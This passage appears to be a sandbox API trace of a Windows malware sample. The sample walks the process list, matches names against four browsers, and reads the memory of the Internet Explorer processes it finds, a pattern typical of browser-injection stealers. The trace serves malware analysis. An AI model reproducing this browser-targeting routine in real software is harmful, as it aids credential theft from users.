	[0245.406] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0245.406] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x9278
	[0245.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.406] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0245.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.407] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.407] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0245.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.407] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.407] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0245.408] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x927c
	[0245.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.408] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0245.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.409] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.409] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0245.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.409] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.409] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0245.410] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x9280
	[0245.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.410] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0245.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.410] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.411] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0245.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.411] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.411] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0245.412] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0245.412] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0245.413] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x9284
	[0245.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.413] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0245.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.413] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.414] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0245.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.415] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.415] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0245.416] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x9288
	[0245.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.416] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0245.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.416] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.416] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0245.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.417] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.417] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0245.418] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x928c
	[0245.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.418] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0245.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.418] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.419] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0245.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.419] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.419] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0245.420] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x9290
	[0245.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.421] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0245.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.421] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.421] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0245.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.422] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.422] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0245.423] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x9294
	[0245.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.423] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0245.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.423] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.424] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0245.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.424] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.425] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0245.425] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x9298
	[0245.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.426] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0245.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.426] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.426] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0245.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.426] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.427] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0245.427] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x929c
	[0245.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.427] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0245.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.428] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.428] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0245.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.429] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.429] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0245.430] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x92a0
	[0245.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.430] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0245.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.430] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.431] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0245.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.431] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.432] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0245.432] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x92a4
	[0245.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.433] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0245.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.433] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.433] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0245.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.433] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.433] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0245.434] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x92a8
	[0245.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.434] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0245.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.435] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.435] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0245.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.435] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.438] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0245.439] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x92ac
	[0245.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.439] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0245.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.440] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.440] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0245.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.441] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.441] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0245.442] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x92b0
	[0245.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.442] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0245.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.443] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.444] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0245.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.444] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.445] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0245.446] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x92b4
	[0245.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.446] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0245.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.446] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.447] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0245.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.448] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.448] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0245.449] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x92b8
	[0245.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.449] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0245.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.450] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.450] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0245.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.451] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.452] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0245.453] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x92bc
	[0245.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.453] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0245.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.453] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.454] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0245.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.454] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.455] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0245.455] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x92c0
	[0245.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.455] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0245.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.456] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0245.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.456] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0245.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.456] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.456] NtQueryInformationProcess (in: ProcessHandle=0x92c0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0245.457] ReadProcessMemory (in: hProcess=0x92c0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0245.457] ReadProcessMemory (in: hProcess=0x92c0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0245.457] ReadProcessMemory (in: hProcess=0x92c0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0245.457] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0245.457] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0245.458] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x92c4
	[0245.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.458] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0245.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.458] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0245.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.458] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0245.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.459] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.459] NtQueryInformationProcess (in: ProcessHandle=0x92c4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0245.459] ReadProcessMemory (in: hProcess=0x92c4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0245.459] ReadProcessMemory (in: hProcess=0x92c4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0245.459] ReadProcessMemory (in: hProcess=0x92c4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0245.459] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0245.460] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0245.460] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x92c8
	[0245.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.460] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0245.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.461] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.461] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0245.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.461] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.462] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0245.462] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x92cc
	[0245.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.462] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0245.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.463] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.463] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0245.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.463] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.464] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
